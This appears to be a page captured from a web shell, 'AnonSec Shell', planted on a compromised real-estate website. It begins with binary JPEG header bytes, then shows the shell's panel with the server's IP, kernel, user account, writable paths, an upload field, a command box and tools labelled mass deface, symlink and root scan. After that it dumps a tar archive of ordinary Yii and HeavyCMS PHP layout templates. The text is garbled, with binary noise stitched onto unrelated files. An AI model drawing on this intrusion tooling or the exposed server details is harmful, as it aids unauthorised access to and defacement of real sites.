JFIFHHCnxxdC"&!1A2Q"aqBb1 ?R{~,.Y|@sl_޸s[+6ϵG};?2Y`&9LP?3rj  "@V]:3T-G*P ( *(@AEY]qqqALn+Wtu?)lQUT*Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ηnu ڶh%(Lvũbb-?M֍݌٥IHln㏷L(69L^"6Pd&1H&8@TUTCJ%eʹFTj4i5=0g J&Wc+3kU@PS@HH33M *"Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePPd\A2glo=WL(6^;k"ucoH"b ,PDVlvL_/:̗rN\mdcw T-O$w+FZ5T *Y~l:99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~YИ3M3@E)GTg%AnpPMUҀhԳW c֦iZ ffR 7qMcyAZTc0bZU k+oG<]APQTA={PDti@c>>KÚ"qL.1Pk6QY7t.k7o<P &yַܼJZyWz{UrS@~P)Y:A"]Y&ScVO%17 6l4i4YR5ruk*ؼdZͨZZ cLakb3N6æ\1`XTloTuTAA 7Uq@2ŬzoʼnБRͪ&8}:e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt"(.=Y:V#'H:δ4#6yjѥBB ;WD-ElFf67*\AmADQ__'2$TX9nu'm@iPDTqS`%u%3[nY, :g = tiXH]ij"+6Z* .~|05s6 ,ǡogm+KtE-BF ES@(UJxM~8%g/=Vw[Vh3lJT rK -kˎYٰ,ukͱٵf sXDP]p]&MS95O+j&f6m463@t8ЕX=6}HR5ٶ06/@嚵*6  "hP@eVDiYQT`7tLf4c?m//B4 lajL} :Eb#PHQb,yN`rkAb^ |}s4XB4*,@[{Ru+%le2}`,kI$U`>OMuhP% ʵ/ L\5aɕVN1R63}ZLj-Dl@*(K\^i@F@551k㫖hQ沬#h XV +;]6zOsFpiX$OQ )ųl4YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 162.19.86.63  /  Your IP : 216.73.216.249   [ Reverse IP ]
Web Server : Apache
System : Linux oirealestate.net 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : oinversion ( 10001)
PHP Version : 5.6.40
Disable Function : opcache_get_status
Domains : 5 Domains
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/oinversion.com/.trash/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/vhosts/oinversion.com/.trash/layouts.tar
main.php000066600000003235151456104610006213 0ustar00<?php
use yii\bootstrap\NavBar;
use yii\bootstrap\Nav;
use yii\helpers\Html;

/* @var $this \yii\web\View */
/* @var $content string */

$asset = yii\gii\GiiAsset::register($this);
?>
<?php $this->beginPage() ?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8"/>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <?= Html::csrfMetaTags() ?>
    <title><?= Html::encode($this->title) ?></title>
    <?php $this->head() ?>
</head>
<body>
    <div class="container-fluid page-container">
        <?php $this->beginBody() ?>
        <?php
        NavBar::begin([
            'brandLabel' => Html::img($asset->baseUrl . '/logo.png'),
            'brandUrl' => ['default/index'],
            'options' => ['class' => 'navbar-inverse navbar-fixed-top'],
        ]);
        echo Nav::widget([
            'options' => ['class' => 'nav navbar-nav navbar-right'],
            'items' => [
                ['label' => 'Home', 'url' => ['default/index']],
                ['label' => 'Help', 'url' => 'http://www.yiiframework.com/doc-2.0/guide-tool-gii.html'],
                ['label' => 'Application', 'url' => Yii::$app->homeUrl],
            ],
        ]);
        NavBar::end();
        ?>
        <div class="container content-container">
            <?= $content ?>
        </div>
        <div class="footer-fix"></div>
    </div>
    <footer class="footer">
        <div class="container">
            <p class="pull-left">A Product of <a href="http://www.yiisoft.com/">Yii Software LLC</a></p>
            <p class="pull-right"><?= Yii::powered() ?></p>
        </div>
    </footer>
<?php $this->endBody() ?>
</body>
</html>
<?php $this->endPage() ?>
blog.php000066600000006435151456104610006217 0ustar00<?php

/* @var $this \yii\web\View */
/* @var $content string */

use yii\data\ActiveDataProvider;
use yii\helpers\Html;
use common\models\FlatPage;
use common\models\BlogPost;
use yii\helpers\Url;

use common\models\BlogCategory;

$recentPosts=BlogPost::find()
  ->joinWith('translations')
  ->where(['is_published' => true])
  ->andWhere(['<>', 'blog_post_lang.slug', ''])
  ->andWhere(['blog_post_lang.language' => Yii::$app->language])
  ->orderBy(['created_at' => SORT_DESC])
  ->limit(3)
  ->all();

$assetBundle = $this->getAssetManager()->getBundle('frontend\assets\OinversionAssetBundle');
?>
<?php $this->beginContent('@app/views/layouts/main.php'); ?>
<div class="site-blog">
    <?php if($this->context->action->id == 'view'){ ?>   
    <div class="blog-banner container-fluid">
        <h2><?= Yii::t('app', 'blog.main-title') ?></h2>
    </div>
    <?php }else{ ?>
    <div class="blog-banner-main container-fluid">
        <h2><?= Yii::t('app', 'blog.main-title') ?></h2>
    </div>
    <?php } ?>
    <div class="container">
        <div class="row">
          <div class="col-sm-8">
            <div class="blog-content">
              <?= $content ?>
            </div>
          </div>
          <div class="col-sm-4">
            <div class="blog-sidebar">
                <div class="categories">
                    <img alt="Categorias" src="<?= $assetBundle->baseUrl ?>/img/ico-categorias.svg"/><h3><?= Yii::t('app', 'blog.categories') ?></h3>
                    <?php $categories=BlogCategory::find()->all(); ?>
                    <ul>
                        <?php foreach ($categories as $category): ?><li><?= Html::a($category->name, $category->url) ?></li><?php endforeach; ?>
                    </ul>
                </div>
                <div class="tags">
                    <img alt="Tags" src="<?= $assetBundle->baseUrl ?>/img/ico-tags.svg"/><h3><?= Yii::t('app', 'blog.tags') ?></h3>
                    <p>
                        <?php 
                        $list=[];
                        foreach ($this->context->getAllTags() as $tag) {
                            $list[]=Html::a($tag, ['blog/index','tag'=>$tag]);
                        }
                        echo implode(", ", $list);
                        ?>
                    </p>
                </div>
                <?php if($this->context->action->id == 'view'){ ?>   
                    <div class="recent-block">
                        <img src="<?= $assetBundle->baseUrl ?>/img/ico-recientes.svg"><h3><?= Yii::t('app', 'blog.recent-posts') ?></h3>
                        <?php foreach ($recentPosts as $post) { ?>
                            <div class="recent-post">
                                <div class="recent-post-img">
                                    <?= Html::a(Html::img($post->getFullUrlFeaturedImage(), ['alt' => $post->title, 'class' => 'img-responsive']), $post->url)?>
                                </div>
                                <div class="recent-post-title">
                                    <?= Html::a($post->title, $post->url); ?>
                                </div>
                            </div>
                        <?php } ?>
                    </div>
                <?php } ?>
            </div>
          </div>
        </div>
    </div>
</div>
<?php $this->endContent(); ?>html.php000066600000010170151456105200006223 0ustar00<?php
use yii\helpers\Html;

/* @var $this \yii\web\View view component instance */
/* @var $message \yii\mail\MessageInterface the message being composed */
/* @var $content string main view render result */

// Open Source email template: https://www.sendwithus.com/resources/templates/go
?>
<?php $this->beginPage() ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <head>
    <meta http-equiv="Content-Type" content="text/html; <?= Yii::$app->charset ?>" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <title><?= Html::encode($this->title) ?></title>
    <?php $this->head() ?>
    <!-- Designed by https://github.com/kaytcat -->
    <!-- Header image designed by Freepik.com -->

    <style type="text/css">
    /* Take care of image borders and formatting */

    img { max-width: 600px; outline: none; text-decoration: none; -ms-interpolation-mode: bicubic;}
    a img { border: none; }
    table { border-collapse: collapse !important; }
    #outlook a { padding:0; }
    .ReadMsgBody { width: 100%; }
    .ExternalClass {width:100%;}
    .backgroundTable {margin:0 auto; padding:0; width:100%!important;}
    table td {border-collapse: collapse;}
    .ExternalClass * {line-height: 115%;}


    /* General styling */

    td {
      font-family: Arial, sans-serif;
      color: #5e5e5e;
      font-size: 16px;
      text-align: left;
    }

    body {
      -webkit-font-smoothing:antialiased;
      -webkit-text-size-adjust:none;
      width: 100%;
      height: 100%;
      color: #5e5e5e;
      font-weight: 400;
      font-size: 16px;
    }


    h1 {
      margin: 10px 0;
    }

    a {
      color: #2b934f;
      text-decoration: none;
    }


    .body-padding {
      padding: 0 75px;
    }


    .force-full-width {
      width: 100% !important;
    }

    .icons {
      text-align: right;
      padding-right: 30px;
    }

    .logo {
      text-align: left;
      padding-left: 30px;
    }

    .computer-image {
      padding-left: 30px;
    }

    .header-text {
      text-align: left;
      padding-right: 30px;
      padding-left: 20px;
    }

    .header {
      color: #232925;
      font-size: 24px;
    }



    </style>

    <style type="text/css" media="screen">
        @media screen {
          /*@import url(http://fonts.googleapis.com/css?family=PT+Sans:400,700);*/
          <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=PT+Sans:400,700">
          /* Thanks Outlook 2013! http://goo.gl/XLxpyl */
          * {
            font-family: 'PT Sans', 'Helvetica Neue', 'Arial', 'sans-serif' !important;
          }
        }
    </style>

    <style type="text/css" media="only screen and (max-width: 599px)">
      /* Mobile styles */
      @media only screen and (max-width: 599px) {

        table[class*="w320"] {
          width: 320px !important;
        }

        td[class*="icons"] {
          display: block !important;
          text-align: center !important;
          padding: 0 !important;
        }

        td[class*="logo"] {
          display: block !important;
          text-align: center !important;
          padding: 0 !important;
        }

        td[class*="computer-image"] {
          display: block !important;
          width: 230px !important;
          padding: 0 45px !important;
          border-bottom: 1px solid #e3e3e3 !important;
        }


        td[class*="header-text"] {
          display: block !important;
          text-align: center !important;
          padding: 0 25px!important;
          padding-bottom: 25px !important;
        }

        *[class*="mobile-hide"] {
          display: none !important;
          width: 0 !important;
          height: 0 !important;
          line-height: 0 !important;
          font-size: 0 !important;
        }


      }
    </style>
  </head>
  <body offset="0" class="body" style="padding:0; margin:0; display:block; background:#ffffff; -webkit-text-size-adjust:none" bgcolor="#ffffff">
    <?php $this->beginBody() ?>
    <?= $content ?>
    <?php $this->endBody() ?>
  </body>
</html>
<?php $this->endPage() ?>text.php000066600000000520151456105200006241 0ustar00<?php
use yii\helpers\Html;

/* @var $this \yii\web\View view component instance */
/* @var $message \yii\mail\MessageInterface the message being composed */
/* @var $content string main view render result */
?>
<?php $this->beginPage() ?>
<?php $this->beginBody() ?>
<?= $content ?>
<?php $this->endBody() ?>
<?php $this->endPage() ?>
left.php000066600000006232151456365360006234 0ustar00<?php
use yii\helpers\Html;
?>

<aside class="main-sidebar">

    <section class="sidebar">

        <!-- Sidebar user panel -->
        <div class="user-panel">
            <div class="pull-left image">
                <?= Html::img(Yii::$app->user->identity->userProfile->getFullUrlAvatar(),
                                ['class'=> 'img-circle',
                                 'alt' => Yii::$app->user->identity->fullName]) ?>
            </div>
            <div class="pull-left info">
                <p><?= Yii::$app->user->identity->fullName ?></p>

                <a href="#"><i class="fa fa-circle text-success"></i> Online</a>
            </div>
        </div>

        <?= dmstr\widgets\Menu::widget(
            [
                'options' => ['class' => 'sidebar-menu'],
                'items' => [
                    ['label' => Yii::t('app', 'Menu'), 'options' => ['class' => 'header']],
                    [
                        'label' => Yii::t('app', 'Pages'),
                        'icon' => 'fa fa-files-o fa-lg',
                        'url' => ['flat-page/index']
                    ],
                    [
                        'label' => Yii::t('app', 'Content'),
                        'icon' => 'fa fa-indent fa-lg',
                        'url' => ['content/index']
                    ],
                    [
                        'label' => Yii::t('app', 'Image Galleries'),
                        'icon' => 'fa fa-image fa-lg',
                        'url' => ['gallery/index']
                    ],
                    [
                        'label' => Yii::t('app', 'Blog'),
                        'icon' => 'fa fa-book fa-lg',
                        'url' => '#',
                        'items' => [
                                    ['label' => Yii::t('app', 'Posts'),
                                     'icon' => 'fa fa-pencil-square-o',
                                     'url' => ['blog-post/index']],
                                     ['label' => Yii::t('app', 'Categories'),
                                     'icon' => 'fa fa-folder-open-o',
                                     'url' => ['blog-category/index']],
                                ],
                    ],
                    [
                        'label' => Yii::t('app', 'Proyectos'),
                        'icon' => 'fa fa-clipboard fa-lg',
                        'url' => ['project/index']
                    ],
                    [
                        'label' => Yii::t('app', 'Equipo'),
                        'icon' => 'fa fa-user fa-lg',
                        'url' => ['member/index']
                    ],
                    /*[
                        'label' => Yii::t('app', 'Translate UI'),
                        'icon' => 'fa fa-language fa-lg',
                        'url' => ['site/translate-frontend']
                    ],
                    [
                        'label' => Yii::t('app', 'Global Configuration'),
                        'icon' => 'fa fa-gear fa-lg',
                        'url' => ['global-configuration/index']
                    ],*/
                ],
            ]
        ) ?>

    </section>

</aside>
content.php000066600000003256151456365360006757 0ustar00<?php

use yii\helpers\Html;
use yii\widgets\Breadcrumbs;
use dmstr\widgets\Alert;

?>
<div class="content-wrapper">
    <section class="content-header">
        <?php if (isset($this->blocks['content-header'])) { ?>
            <h1><?= $this->blocks['content-header'] ?></h1>
        <?php } else { ?>
            <h1>
                <?php
                if ($this->title !== null) {
                    echo \yii\helpers\Html::encode($this->title);
                } else {
                    echo \yii\helpers\Inflector::camel2words(
                        \yii\helpers\Inflector::id2camel($this->context->module->id)
                    );
                    echo ($this->context->module->id !== \Yii::$app->id) ? '<small>Module</small>' : '';
                } ?>
            </h1>
        <?php } ?>

        <?=
        Breadcrumbs::widget(
            [
                'homeLink' => [
                    'label' => Yii::t('yii', 'Home'),
                    'url' => ['site/index'],
                ],
                'links' => isset($this->params['breadcrumbs']) ? $this->params['breadcrumbs'] : [],
            ]
        ) ?>
    </section>

    <section class="content">
        <?= Alert::widget() ?>
        <?= $content ?>
    </section>
</div>

<footer class="main-footer">
    <div class="pull-right hidden-xs">
        <?= Html::a('<b>Version</b> 0.1', 'https://github.com/HeavyDots/heavyCMS',
                    ['target'=>'_blank', 'rel' => 'nofollow'])
        ?>
    </div>
    <strong>
        HeavyCMS by <?= Html::a('HeavyDots', 'http://heavydots.com/',
                                ['rel' => 'nofollow', 'target' => '_blank'])
                    ?>
    </strong>
</footer>header.php000066600000005575151456365360006543 0ustar00<?php
use yii\helpers\Url;
use yii\helpers\Html;
use backend\widgets\LanguageDropdown;
/* @var $this \yii\web\View */
/* @var $content string */
?>

<header class="main-header">

    <?= Html::a('<span class="logo-mini">CMS</span><span class="logo-lg">' . Yii::$app->name . '</span>', Url::toRoute(['site/index']), ['class' => 'logo']) ?>

    <nav class="navbar navbar-static-top" role="navigation">

        <a href="#" class="sidebar-toggle" data-toggle="offcanvas" role="button">
            <span class="sr-only">Toggle navigation</span>
        </a>

        <div class="navbar-custom-menu">
            <ul class="nav navbar-nav">
                <?= LanguageDropdown::widget(['activeClass' => 'active']) ?>

                <li class="dropdown user user-menu">
                    <a href="#" class="dropdown-toggle" data-toggle="dropdown">
                        <?= Html::img(Yii::$app->user->identity->userProfile->getFullUrlAvatar(),
                                ['class'=> 'user-image',
                                 'alt' => Yii::$app->user->identity->fullName]) ?>
                        <span class="hidden-xs"><?= Yii::$app->user->identity->fullName ?></span>
                    </a>
                    <ul class="dropdown-menu">
                        <!-- User image -->
                        <li class="user-header">
                            <?= Html::img(Yii::$app->user->identity->userProfile->getFullUrlAvatar(),
                                ['class'=> 'img-circle',
                                 'alt' => Yii::$app->user->identity->fullName]) ?>

                            <p>
                                <?= Yii::$app->user->identity->fullName ?>
                                <small><?= Html::encode(Yii::t('app', 'Great to see you again!')); ?></small>
                            </p>
                        </li>
                        <!-- Menu Footer-->
                        <li class="user-footer">
                            <div class="pull-left">
                                <?=
                                    Html::a(
                                        Yii::t('app', 'Profile'),
                                        ['site/user-profile'],
                                        ['class' => 'btn btn-default btn-flat']
                                        );
                                ?>
                            </div>
                            <div class="pull-right">
                                <?= Html::a(
                                    Yii::t('app', 'Sign out'),
                                    ['/site/logout'],
                                    ['data-method' => 'post', 'class' => 'btn btn-default btn-flat']
                                ) ?>
                            </div>
                        </li>
                    </ul>
                </li>
            </ul>
        </div>
    </nav>
</header>
main-error.php000066600000001200151456365360007343 0ustar00<?php
use backend\assets\AppAsset;
use yii\helpers\Html;

/* @var $this \yii\web\View */
/* @var $content string */

dmstr\web\AdminLteAsset::register($this);
?>
<?php $this->beginPage() ?>
<!DOCTYPE html>
<html lang="<?= Yii::$app->language ?>">
<head>
    <meta charset="<?= Yii::$app->charset ?>"/>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <?= Html::csrfMetaTags() ?>
    <title><?= Html::encode($this->title) ?></title>
    <?php $this->head() ?>
</head>
<body class="error-page">

<?php $this->beginBody() ?>

    <?= $content ?>

<?php $this->endBody() ?>
</body>
</html>
<?php $this->endPage() ?>
main-login.php000066600000001200151456365360007322 0ustar00<?php
use backend\assets\AppAsset;
use yii\helpers\Html;

/* @var $this \yii\web\View */
/* @var $content string */

dmstr\web\AdminLteAsset::register($this);
?>
<?php $this->beginPage() ?>
<!DOCTYPE html>
<html lang="<?= Yii::$app->language ?>">
<head>
    <meta charset="<?= Yii::$app->charset ?>"/>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <?= Html::csrfMetaTags() ?>
    <title><?= Html::encode($this->title) ?></title>
    <?php $this->head() ?>
</head>
<body class="login-page">

<?php $this->beginBody() ?>

    <?= $content ?>

<?php $this->endBody() ?>
</body>
</html>
<?php $this->endPage() ?>
generator.php000066600000001747151703374270007271 0ustar00<?php
use yii\helpers\Html;

/* @var $this \yii\web\View */
/* @var $generators \yii\gii\Generator[] */
/* @var $activeGenerator \yii\gii\Generator */
/* @var $content string */

$generators = Yii::$app->controller->module->generators;
$activeGenerator = Yii::$app->controller->generator;
?>
<?php $this->beginContent('@yii/gii/views/layouts/main.php'); ?>
<div class="row">
    <div class="col-md-3 col-sm-4">
        <div class="list-group">
            <?php
            foreach ($generators as $id => $generator) {
                $label = '<i class="glyphicon glyphicon-chevron-right"></i>' . Html::encode($generator->getName());
                echo Html::a($label, ['default/view', 'id' => $id], [
                    'class' => $generator === $activeGenerator ? 'list-group-item active' : 'list-group-item',
                ]);
            }
            ?>
        </div>
    </div>
    <div class="col-md-9 col-sm-8">
        <?= $content ?>
    </div>
</div>
<?php $this->endContent(); ?>

Anon7 - 2022
AnonSec Team